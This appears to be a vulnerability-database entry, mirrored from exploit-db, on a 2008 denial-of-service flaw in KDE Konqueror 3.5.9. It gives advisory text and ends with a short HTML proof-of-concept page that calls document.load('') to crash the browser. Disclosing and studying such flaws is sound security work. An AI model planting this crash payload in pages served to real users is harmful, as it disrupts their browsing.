KDE Konqueror 3.5.9 - JavaScript 'load' Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056899 漏洞类型
发布时间 2008-10-10 更新时间 2008-10-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32471
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/31696/info

KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted JavaScript code.

An attacker may exploit this vulnerability to cause Konqueror to crash, resulting in denial-of-service conditions.

The issue affects Konqueror 3.5.9; other versions may also be affected. 

<!--- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Tested on Ubuntu 8.04 + Konqueror 3.5.9 A product of my fuzzing projects :) --> <html> <script type="text/javascript"> document.load(''); </script> </html>